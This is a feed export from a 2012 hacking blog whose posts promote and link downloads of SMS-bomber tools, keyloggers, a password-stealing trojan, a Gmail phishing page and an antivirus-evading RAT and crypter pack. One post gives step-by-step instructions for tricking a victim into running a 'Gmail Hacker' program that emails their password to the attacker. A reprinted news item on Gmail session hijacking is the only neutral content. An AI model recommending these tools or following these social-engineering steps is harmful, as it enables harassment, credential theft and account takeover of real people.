tag:blogger.com,1999:blog-33066894958126779832024-02-07T05:32:49.901-08:00Acc Hacknilhttp://www.blogger.com/profile/16544407981243685735noreply@blogger.comBlogger34125tag:blogger.com,1999:blog-3306689495812677983.post-40569038341192136972012-05-05T11:14:00.001-07:002012-12-20T08:44:31.561-08:00BOMB MOBILE PHONE WITH SMS : BEAVER'S SMS BOMBER<div dir="ltr" style="text-align: left;" trbidi="on">
<br />
<h3 class="post-title">
</h3>
<div class="post-header-line-1">
</div>
<div class="post-body entry-content">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi_3FWT1TgDNfAaJ1s6Cx7SjwgEG02rX4DTxmfU1e4Y4UYpZWkc08F8V19S2Tfeal1misEwARnTO7UA9e3xtMB8lWSNsm_MC_YeN1845MIHbhsAwWKtGFoNeBQOF4BJzlruKsm5zt4T82o/s1600-h/smsss.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi_3FWT1TgDNfAaJ1s6Cx7SjwgEG02rX4DTxmfU1e4Y4UYpZWkc08F8V19S2Tfeal1misEwARnTO7UA9e3xtMB8lWSNsm_MC_YeN1845MIHbhsAwWKtGFoNeBQOF4BJzlruKsm5zt4T82o/s320/smsss.png" /></a></div>
<div style="font-family: Georgia,"Times New Roman",serif;">
<br /></div>
<div style="font-family: Georgia,"Times New Roman",serif;">
<span style="font-size: small;">Beaver's SMS Bomber is a wonderful program which can bomb victims mobile phone with hundreds and thousands of SMS. It uses GMAIL SMTP server by default and supports many networks all over the world. It also has the custom option in Phone Settings by which we can add victim's SMS gateway if it is not in the list. We can find SMS gateways by googling for it. </span><span style="color: black;">All credits to Beaver for this nice program.</span><br />
<br />
<span style="font-size: small;">Download here: </span><br />
<br />
<a href="http://www.mediafire.com/download.php?mc5dkcwzg2y"><span style="font-size: small;">http://www.mediafire.com/download.php?mc5dkcwzg2y</span></a><span style="font-size: small;"><br />
</span></div>
<div style="clear: both;">
</div>
</div>
</div>
13http://www.blogger.com/profile/08185313147597773374noreply@blogger.com1tag:blogger.com,1999:blog-3306689495812677983.post-81147249427458916722012-05-05T11:12:00.003-07:002012-05-05T11:12:49.063-07:00BOMB MOBILE PHONE WITH SMS : GLOBAL SMS BOMBER<div dir="ltr" style="text-align: left;" trbidi="on">
<br />
<div class="post-header-line-1">
</div>
<div class="post-body entry-content">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgwMEnLtrh48IeE_cKYXnz8UQIQc9HNNaXm72Sm0tgf0DyIAhzjVurUrdHHQI1XUh_VgHWzHaYjLFt5kbPpvIJyGcQB8P33Jws02XYM-yom-jq1HM_1nRP62MTb2aV26fe3QpAi0aVu5Qw/s1600-h/SMS+Bomber.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgwMEnLtrh48IeE_cKYXnz8UQIQc9HNNaXm72Sm0tgf0DyIAhzjVurUrdHHQI1XUh_VgHWzHaYjLFt5kbPpvIJyGcQB8P33Jws02XYM-yom-jq1HM_1nRP62MTb2aV26fe3QpAi0aVu5Qw/s320/SMS+Bomber.jpg" /></a></div>
<span style="font-size: small;">Global SMS Bomber is another nice program which can bomb victims' mobile phone with hundreds of SMS. It uses your Gmail account to do that and incorporates over 100 networks all around the world.</span><br />
<span style="font-size: small;"><br />
</span><br />
<span style="font-size: small;">Download here:</span><br />
<br />
<a href="http://www.mediafire.com/download.php?rfxzf4jcjm2">http://www.mediafire.com/download.php?rfxzf4jcjm2</a>
<br />
<div style="clear: both;">
</div>
</div>
</div>13http://www.blogger.com/profile/08185313147597773374noreply@blogger.com0tag:blogger.com,1999:blog-3306689495812677983.post-53964819260800424792012-05-05T11:12:00.001-07:002012-05-05T11:12:01.657-07:00BOMB MOBILE PHONE WITH SMS : BEAVER'S SMS BOMBER PRO<div dir="ltr" style="text-align: left;" trbidi="on">
<br />
<h3 class="post-title">
<br /></h3>
<div class="post-header-line-1">
</div>
<div class="post-body entry-content">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg86GtXmnWveeWMy9FhEtvLmFDV_RiyCn81NBj1KSmt_UyxBvVsLte4BJ6rfnl-zWP-dKp4DteUUFNuMb7HdmpwCvxleY8o9GDPqSdc3ZyHiYgb4iJOM5fHjLY-K6TRTS8Apv_45-4H6lc/s1600/beaver+sms+bomber+pro.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg86GtXmnWveeWMy9FhEtvLmFDV_RiyCn81NBj1KSmt_UyxBvVsLte4BJ6rfnl-zWP-dKp4DteUUFNuMb7HdmpwCvxleY8o9GDPqSdc3ZyHiYgb4iJOM5fHjLY-K6TRTS8Apv_45-4H6lc/s320/beaver+sms+bomber+pro.jpg" /></a></div>
This program will bomb the victim's mobile phone with tons of SMS. It supports all major networks around the world. But if your network is not in the list, then don't worry, you can also add the carrier network with the help of "custom" option. You can also load list of multiple victims and bomb them simultaneously. The improvement that Beaver has made in this version over his previous SMS Bomber is that you can spoof the email address from which you are bombing the victim's mobile phone. For Example, If there was an error sending the message, it will ask you if you wanna change the E-mail/Password you are using. All credits to Beaver for this nice program.<br />
<br />
Download here <br />
<br />
<a href="http://www.mediafire.com/download.php?zmd4mtbmtol%20">http://www.mediafire.com/download.php?zmd4mtbmtol </a>
<br />
<div style="clear: both;">
</div>
</div>
</div>13http://www.blogger.com/profile/08185313147597773374noreply@blogger.com0tag:blogger.com,1999:blog-3306689495812677983.post-61882422888129135792012-05-05T11:09:00.003-07:002012-12-20T08:45:35.582-08:00EMAIL ACCOUNT HACKING SOFTWARE : VIC SPY KEYLOGGER<div dir="ltr" style="text-align: left;" trbidi="on">
<br />
<div class="post-header-line-1">
</div>
<div class="post-body entry-content">
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjAJdZYiKjzg3OWga8y2L2OK9S8bjOLA_vB0nyrMkq8C0ouxSv4s-GmAnQn6YJLFOqyg3Z-6VjV_v_5yoOG4pFJOctfYmOdP6USVAgNG9X813tZWBugUn_rvF6TuYldqWx1RYZiCEvFYvg/s1600-h/5160400ed6logger.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjAJdZYiKjzg3OWga8y2L2OK9S8bjOLA_vB0nyrMkq8C0ouxSv4s-GmAnQn6YJLFOqyg3Z-6VjV_v_5yoOG4pFJOctfYmOdP6USVAgNG9X813tZWBugUn_rvF6TuYldqWx1RYZiCEvFYvg/s320/5160400ed6logger.jpg" /></a></div>
<br />
<div style="font-family: Georgia,"Times New Roman",serif;">
<span style="font-size: small;">Vic Spy Keylogger is a simple keylogger program which records keystrokes and all the computer activity of the user on whose computer it is installed. There is no need to install it, it runs immediately after extraction from archive. </span></div>
<div style="font-family: Georgia,"Times New Roman",serif;">
<br />
<span style="font-size: small;">Download here: </span><br />
<br />
<span style="font-size: small;"><a href="http://www.ziddu.com/download/6949476/VicSpy2008.rar.html">http://www.ziddu.com/download/6949476/VicSpy2008.rar.html</a> </span><br />
<br />
<span style="font-size: small;">Password: hackingguide</span></div>
<div style="clear: both;">
</div>
</div>
</div>
13http://www.blogger.com/profile/08185313147597773374noreply@blogger.com0tag:blogger.com,1999:blog-3306689495812677983.post-40741272960774455642012-05-05T11:09:00.001-07:002012-05-05T11:09:14.230-07:00EMAIL ACCOUNT HACKING SOFTWARE : ISTEALER 4.0<div dir="ltr" style="text-align: left;" trbidi="on">
<br />
<div class="post-header-line-1">
</div>
<div class="post-body entry-content">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgal0bv09DG1oe-6IzfL__qTtQswfSHDE33-e1bb3Xy1dtPFJC1toshjTA0SiK4t1tcxt98AtH_5qIIMneSntog8rmV0m7rzeIwaqMTmTNIOguuJ6bE7Bl2brSTclfMMTD5V_vxxol2lZU/s1600-h/ISTEALER1.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgal0bv09DG1oe-6IzfL__qTtQswfSHDE33-e1bb3Xy1dtPFJC1toshjTA0SiK4t1tcxt98AtH_5qIIMneSntog8rmV0m7rzeIwaqMTmTNIOguuJ6bE7Bl2brSTclfMMTD5V_vxxol2lZU/s320/ISTEALER1.jpg" /></a></div>
<div style="font-family: Georgia,"Times New Roman",serif;">
<br />
<span style="font-size: small;">IStealer is a password stealing trojan program which hacks passwords and secretly records all the typed keystrokes of the victim to which it is sent. </span><br />
<br />
<span style="font-size: small;">Download here: </span><br />
<br />
<span style="font-size: small;"><a href="http://www.ziddu.com/download/6953493/ISTEALER.rar.html">http://www.ziddu.com/download/6953493/ISTEALER.rar.html</a> </span><br />
<br />
<span style="font-size: small;">Password: hackingguide</span></div>
<div style="clear: both;">
</div>
</div>
</div>13http://www.blogger.com/profile/08185313147597773374noreply@blogger.com0tag:blogger.com,1999:blog-3306689495812677983.post-6543492593779816552012-05-05T11:08:00.001-07:002012-05-05T11:08:13.144-07:00EMAIL ACCOUNT HACKING SOFTWARE : GENERAL KEYLOGGER<div dir="ltr" style="text-align: left;" trbidi="on">
<br />
<h3 class="post-title">
<br /></h3>
<div class="post-header-line-1">
</div>
<div class="post-body entry-content">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhAJDASJlY0l-cGHAYt5Use4BBRdvBMl7iSZEEBwRHmZ9DrBz-Q4LZsAj42G5Mm_vGC6AjOUik-KRgvl9MAcRCmvQGu766RofkvP529VJYBT8YVdJ0-VuE95W9vBe4mplWJJTTZQSpy7mQ/s1600-h/builderss.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhAJDASJlY0l-cGHAYt5Use4BBRdvBMl7iSZEEBwRHmZ9DrBz-Q4LZsAj42G5Mm_vGC6AjOUik-KRgvl9MAcRCmvQGu766RofkvP529VJYBT8YVdJ0-VuE95W9vBe4mplWJJTTZQSpy7mQ/s320/builderss.png" /></a></div>
<br />
<div style="font-family: Georgia,"Times New Roman",serif;">
<span style="font-size: small;">General Keylogger is another keylogger program which records keystrokes and all the computer activity of the user on whose computer it is installed. There is no need to install it, it runs immediately after extraction from archive. </span><span style="font-size: small;"></span><br />
<br />
<span style="font-size: small;">Download here: </span><br />
<br />
<span style="font-size: small;"><a href="http://www.ziddu.com/download/7012059/KEYLOG.rar.html">http://www.ziddu.com/download/7012059/KEYLOG.rar.html</a> </span><br />
<br />
<span style="font-size: small;">Password: hackingguide</span></div>
<div style="clear: both;">
</div>
</div>
</div>13http://www.blogger.com/profile/08185313147597773374noreply@blogger.com0tag:blogger.com,1999:blog-3306689495812677983.post-9935452243458397902012-05-05T11:07:00.001-07:002012-12-20T08:50:47.588-08:00HACKER TOOLS<div dir="ltr" style="text-align: left;" trbidi="on">
<br />
<div class="post-header-line-1">
</div>
<div class="post-body entry-content">
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgib3HhJqIo3fECAdRu2hJWiEHJekPd0ZtvA5rRMin5P_AdeA-MQG0vqkK8uRkPAVjqTvZFldr-2FFxbRLh7qZPqP9s0V0T0pOOVGmebPkf0DGJSPsXsR92UN3zC8OuQc_OukYpb0huWDU/s1600/HACKER+TOOLS.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgib3HhJqIo3fECAdRu2hJWiEHJekPd0ZtvA5rRMin5P_AdeA-MQG0vqkK8uRkPAVjqTvZFldr-2FFxbRLh7qZPqP9s0V0T0pOOVGmebPkf0DGJSPsXsR92UN3zC8OuQc_OukYpb0huWDU/s320/HACKER+TOOLS.jpg" /></a></div>
This is a nice collection of' "must have" tools for a hacker such as RAT, keylogger, mail bomber, crypter etc. The advantage of using this package is that all the tools are joined under the same GUI and all the tools are FUD i.e. they will not be detected by your antivirus. So I advice you to <span style="color: red;">use them at your own risk</span>. Alternatively you can use <a href="http://hackingncrackingtools.blogspot.com/2009/10/ultimate-virus-protection-sandboxie.html">Sandboxie</a> or <a href="http://hackingncrackingtools.blogspot.com/2009/10/deep-freeze.html">Deep Freeze</a> to protect your computer if something unexpected happens.<br />
<br />
Download here (Pass included in archive):<br />
<br />
<a href="http://www.mediafire.com/download.php?qz0myynoguy">http://www.mediafire.com/download.php?qz0myynoguy </a>
<br />
<br />
<br />
<span style="text-align: justify;"> </span><span style="text-align: justify;">@Jasper Dekcah@</span><br />
<div style="clear: both;">
</div>
</div>
</div>
13http://www.blogger.com/profile/08185313147597773374noreply@blogger.com0tag:blogger.com,1999:blog-3306689495812677983.post-70547612532240346072012-05-05T11:06:00.001-07:002012-05-05T11:06:46.117-07:00EMAIL ACCOUNT HACKING SOFTWARE : GMAIL PASSWORD RECOVERY<div dir="ltr" style="text-align: left;" trbidi="on">
<br />
<div class="post-body entry-content">
<div class="separator" style="clear: both; text-align: left;">
<span class="Apple-style-span" style="font-size: 19px;"><b><br /></b></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjfLltDeESLq6ytXkXs9Powtz6vfKdu9w5DR-TgSTFa-iiL-xyzfpkXT-kbmzS1qZ8A2mvlGEA3470W0ZrofNk-ZO0l4QtfgHGyxh3NZFj57QOZhbWRo7OwqyXJiW8on_5lksCPYOjMeis/s1600-h/gmail-password-recovery.gif" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjfLltDeESLq6ytXkXs9Powtz6vfKdu9w5DR-TgSTFa-iiL-xyzfpkXT-kbmzS1qZ8A2mvlGEA3470W0ZrofNk-ZO0l4QtfgHGyxh3NZFj57QOZhbWRo7OwqyXJiW8on_5lksCPYOjMeis/s320/gmail-password-recovery.gif" /></a></div>
<br />
<div style="font-family: Georgia,"Times New Roman",serif;">
<span style="font-size: small;">GMail Password Recovery is a tool which scans for the computer for locally stored GMail passwords to hack them. <br />
</span></div>
<div style="font-family: Georgia,"Times New Roman",serif;">
<br /></div>
<div style="font-family: Georgia,"Times New Roman",serif;">
<span style="font-size: small;">Download here: </span></div>
<div style="font-family: Georgia,"Times New Roman",serif;">
<br /></div>
<div style="font-family: Georgia,"Times New Roman",serif;">
<span style="font-size: small;"><a href="http://www.ziddu.com/download/6953377/GmailPasswordRecoveryv1.10.02.08.rar.html">http://www.ziddu.com/download/6953377/GmailPasswordRecoveryv1.10.02.08.rar.html</a> </span></div>
<div style="font-family: Georgia,"Times New Roman",serif;">
<br /></div>
<div style="font-family: Georgia,"Times New Roman",serif;">
<span style="font-size: small;">Password: hackingguide</span></div>
<div style="clear: both;">
</div>
</div>
</div>13http://www.blogger.com/profile/08185313147597773374noreply@blogger.com0tag:blogger.com,1999:blog-3306689495812677983.post-44301654284186542142012-05-05T11:05:00.001-07:002012-05-05T11:05:32.832-07:00HACKING GMAIL ACCOUNTS : GMAIL PHISHER<div dir="ltr" style="text-align: left;" trbidi="on">
<br />
<h3 class="post-title">
<br /></h3>
<div class="post-header-line-1">
</div>
<div class="post-body entry-content">
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjM66kPW08uFouLlflqkAIhDBdIOapEH-d6NAYkNL3hRA2o6U5b1d370n0VKTqvx9NYY7G8rejGZmnBm7tbBa-CQFUoO26ynzQ16pRAlZ1l47xXC1oC6orHiDgdxx5fvEU59kZR0RQ9tCE/s1600-h/gmailphisher1.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjM66kPW08uFouLlflqkAIhDBdIOapEH-d6NAYkNL3hRA2o6U5b1d370n0VKTqvx9NYY7G8rejGZmnBm7tbBa-CQFUoO26ynzQ16pRAlZ1l47xXC1oC6orHiDgdxx5fvEU59kZR0RQ9tCE/s320/gmailphisher1.jpg" /></a></div>
<br />
<div style="font-family: Georgia,"Times New Roman",serif;">
<span style="font-size: small;">Gmail phisher is a phisher (a fake login page) for hacking Gmail accounts. Just send it to anyone and ask him to enter his login credentials. Once he enters his login details, a text file containing passwords of the user is generated automatically. </span><br />
<br />
<span style="font-size: small;">Download here: </span><br />
<br />
<span style="font-size: small;"><a href="http://www.ziddu.com/download/6966112/GMAILPHISHER.rar.html">http://www.ziddu.com/download/6966112/GMAILPHISHER.rar.html</a> </span><br />
<br />
<span style="font-size: small;">Password: hackingguide</span></div>
<div style="clear: both;">
</div>
</div>
</div>13http://www.blogger.com/profile/08185313147597773374noreply@blogger.com0tag:blogger.com,1999:blog-3306689495812677983.post-67522028262137343012012-05-05T11:04:00.001-07:002012-05-05T11:04:39.672-07:00HACK GMAIL ACCOUNTS : GMAIL HACKER<div dir="ltr" style="text-align: left;" trbidi="on">
<br />
<h3 class="post-title">
<br /></h3>
<div class="post-header-line-1">
</div>
<div class="post-body entry-content">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhYcnO_VQq0aWymDMU1fJZLspiXZzJU1b_VvwoqnJoPqbCI19G_CVsCy-hLiRCvZ1DppmgisBiO6PipQCm2fPPO2aqG2glgjTYQO44gEHnQWQmDHrAdK4unF7es5sMk2sGB9jBcx5Y-WqY/s1600/Untitled.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhYcnO_VQq0aWymDMU1fJZLspiXZzJU1b_VvwoqnJoPqbCI19G_CVsCy-hLiRCvZ1DppmgisBiO6PipQCm2fPPO2aqG2glgjTYQO44gEHnQWQmDHrAdK4unF7es5sMk2sGB9jBcx5Y-WqY/s320/Untitled.jpg" /></a></div>
This software will hack Gmail accounts. All you need is a bit of social engineering. Just follow the steps below:<br />
<br />
1. Extract the RAR archive in a separate folder.<br />
2. Run Gmail Hacker Builder.exe file on your computer.<br />
3. Enter in your Gmail address and password (I created a new Gmail ID to test this and I recommend you to do the same). Hit on Build. Then Gmail hacker builder will create your own Gmail hacker application - Gmail Hacker.exe file which you can use to hack gmail password.<br />
4. Now, send this Gmail Hacker.exe file to victim of which you wanna hack Gmail password and convince him that this Gmail hacker can hack Gmail password (Social Engineering as I already said).<br />
5. Ask him to run Gmail Hacker.exe and enter all information including his Gmail ID and password and Gmail ID of victim he wanna hack. As he enters this information and hits "Hack Them", he will receive an error message<br />
6. You will receive an email in your account containing his password. Enjoy!!!<br />
<br />
Download here:<br />
<br />
<a href="http://www.mediafire.com/download.php?znjl0mezh0n">http://www.mediafire.com/download.php?znjl0mezh0n</a>
<br />
<div style="clear: both;">
</div>
</div>
</div>13http://www.blogger.com/profile/08185313147597773374noreply@blogger.com0tag:blogger.com,1999:blog-3306689495812677983.post-46488453577682846552012-05-05T11:02:00.002-07:002012-05-05T11:02:37.733-07:00Gmail Account Hacking Tool Posted on August 19, 2008 by Ashik<div dir="ltr" style="text-align: left;" trbidi="on">
<div class="hfeed" id="page" style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 15px; font-style: inherit; font-weight: inherit; margin-bottom: 2em; margin-left: auto; margin-right: auto; margin-top: 2em; max-width: 1000px; outline-color: initial; outline-style: initial; outline-width: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">
<div id="main" style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; clear: both; font-family: inherit; font-size: 15px; font-style: inherit; font-weight: inherit; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; outline-color: initial; outline-style: initial; outline-width: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 1.625em; vertical-align: baseline;">
<div id="primary" style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 15px; font-style: inherit; font-weight: inherit; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; outline-color: initial; outline-style: initial; outline-width: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline; width: 947px;">
<div id="content" role="main" style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 15px; font-style: inherit; font-weight: inherit; margin-bottom: 0px; margin-left: 7.599999904632568%; margin-right: 7.599999904632568%; margin-top: 0px; outline-color: initial; outline-style: initial; outline-width: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; position: relative; vertical-align: baseline; width: auto;">
<article class="post-343 post type-post status-publish format-standard hentry category-cracking category-decryption category-google-hacking category-orkut-hacking category-security category-software category-tips-n-tricks tag-account tag-adsense tag-blogger tag-cracking tag-gmail tag-google tag-hacking tag-orkut" id="post-343" style="border-bottom-color: initial; border-bottom-style: none; border-bottom-width: initial; display: block; margin-bottom: 1.625em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 4.875em; position: relative;"><div class="entry-content" style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 15px; font-style: inherit; font-weight: inherit; margin-bottom: 0px; margin-left: auto; margin-right: auto; margin-top: 0px; outline-color: initial; outline-style: initial; outline-width: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 1.625em; vertical-align: baseline; width: 554px;">
<div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 15px; font-style: inherit; font-weight: inherit; margin-bottom: 1.625em; margin-left: 0px; margin-right: 0px; margin-top: 0px; outline-color: initial; outline-style: initial; outline-width: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">
A tool that automatically steals IDs of non-encrypted sessions and breaks into Google Mail accounts has been presented at the Defcon hackers’ conference in Las Vegas.</div>
<div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 15px; font-style: inherit; font-weight: inherit; margin-bottom: 1.625em; margin-left: 0px; margin-right: 0px; margin-top: 0px; outline-color: initial; outline-style: initial; outline-width: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">
Last week Google introduced a new feature in Gmail that allows users to permanently switch on SSL and use it for every action involving Gmail, and not only, authentication. Users who did not turn it on now have a serious reason to do so as Mike Perry, the reverse engineer from San Francisco who developed the tool is planning to release it in two weeks.</div>
<div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 15px; font-style: inherit; font-weight: inherit; margin-bottom: 1.625em; margin-left: 0px; margin-right: 0px; margin-top: 0px; outline-color: initial; outline-style: initial; outline-width: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">
When you log in to Gmail the website sends a cookie (a text file) containing your session ID to the browser. This file makes it possible for the website to know that you are authenticated and keep you logged in for two weeks, unless you manually hit the sign out button. When you hit sign out this cookie is cleared.</div>
<div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 15px; font-style: inherit; font-weight: inherit; margin-bottom: 1.625em; margin-left: 0px; margin-right: 0px; margin-top: 0px; outline-color: initial; outline-style: initial; outline-width: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">
Even though when you log in, Gmail forces the authentication over SSL (Secure Socket Layer), you are not secure because it reverts back to a regular unencrypted connection after the authentication is done. According to Google this behavior was chosen because of low-bandwidth users, as SLL connections are slower.</div>
<div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 15px; font-style: inherit; font-weight: inherit; margin-bottom: 1.625em; margin-left: 0px; margin-right: 0px; margin-top: 0px; outline-color: initial; outline-style: initial; outline-width: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">
The problem lies with the fact that every time you access anything on Gmail, even an image, your browser also sends your cookie to the website. This makes it possible for an attacker sniffing traffic on the network to insert an image served from http://mail.google.com and force your browser to send the cookie file, thus getting your session ID. Once this happens the attacker can log in to the account without the need of a password. People checking their e-mail from public wireless hotspots are obviously more likely to get attacked than the ones using secure wired networks.<span style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; color: black; font-family: inherit; font-size: 15px; font-style: inherit; font-weight: inherit; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; outline-color: initial; outline-style: initial; outline-width: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">Todd Mumford, from the <a href="http://www.seovisions.com/" style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; color: #1982d1; font-family: inherit; font-size: 15px; font-style: inherit; font-weight: inherit; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; outline-color: initial; outline-style: initial; outline-width: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-decoration: none; vertical-align: baseline;" target="_blank" title="SEO Visions">SEO company</a> called <a href="http://www.seovisions.com/internet-marketing.html" style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; color: #1982d1; font-family: inherit; font-size: 15px; font-style: inherit; font-weight: inherit; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; outline-color: initial; outline-style: initial; outline-width: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-decoration: none; vertical-align: baseline;" target="_blank" title="SEO Visions">SEO Visions Inc</a>, states “This can be a serious problem for Internet Marketers who travel often and use their wireless laptops and Gmal services often and do not always have access to a secure connection”</span></div>
<div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 15px; font-style: inherit; font-weight: inherit; margin-bottom: 1.625em; margin-left: 0px; margin-right: 0px; margin-top: 0px; outline-color: initial; outline-style: initial; outline-width: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">
<span style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; color: black; font-family: inherit; font-size: 15px; font-style: inherit; font-weight: inherit; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; outline-color: initial; outline-style: initial; outline-width: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">Per</span>ry mentioned that he notified Google about this situation over a year ago and even though eventually it made this option available, he is not happy with the lack of information. “Google did not explain why using this new feature was so important” he said. He continued and explained the implications of not informing the users, “This gives people who routinely log in to Gmail beginning with an https:// session a false sense of security, because they think they’re secure but they’re really not.”</div>
<div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 15px; font-style: inherit; font-weight: inherit; margin-bottom: 1.625em; margin-left: 0px; margin-right: 0px; margin-top: 0px; outline-color: initial; outline-style: initial; outline-width: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">
If you are logging in to your Gmail account from different locations and you would like to benefit from this option only when you are using unsecured networks, you can force it by manually typing https://mail.google.com before you log in. This will access the SSL version of Gmail and it will be persistent over your entire session and not only during authentication.</div>
</div>
</article></div>
</div>
</div>
</div>
</div>13http://www.blogger.com/profile/08185313147597773374noreply@blogger.com0tag:blogger.com,1999:blog-3306689495812677983.post-61646299117181405242012-05-05T04:57:00.000-07:002012-05-05T04:57:03.919-07:00KILL TASKS ON VICTIM COMPUTER : AV KILLER<div dir="ltr" style="text-align: left;" trbidi="on">
<br />
<h3 class="post-title">
<br /></h3>
<div class="post-header-line-1">
</div>
<div class="post-body entry-content">
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
